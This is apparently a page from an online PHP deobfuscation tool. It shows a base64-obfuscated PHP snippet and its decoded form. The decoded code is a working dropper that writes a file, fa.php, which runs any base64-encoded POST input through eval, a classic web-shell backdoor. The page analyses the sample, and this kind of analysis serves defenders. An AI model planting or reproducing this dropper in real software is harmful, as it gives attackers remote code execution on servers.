Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhLnBocCcsJ3crJyk7JGRhdGE9Jzw/IGVjaG8gIkZhcmlzIG9uIHRo..

Decoded Output download

$f=fopen('fa.php','w+');$data='<? echo "Faris on the mic :D<br>-----------------";eval(base64_decode($_POST[fa]));echo "-----------------"; ?>';fwrite($f,$data);echo "done";

Did this file decode correctly?

Original Code

<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhLnBocCcsJ3crJyk7JGRhdGE9Jzw/IGVjaG8gIkZhcmlzIG9uIHRoZSBtaWMgOkQ8YnI+LS0tLS0tLS0tLS0tLS0tLS0iO0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW2ZhXSkpO2VjaG8gIi0tLS0tLS0tLS0tLS0tLS0tIjsgPz4nO2Z3cml0ZSgkZiwkZGF0YSk7ZWNobyAiZG9uZSI7Cg==")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 3c919381b1d12663b6e9340075da80dc
Eval Count 1
Decode Time 90 ms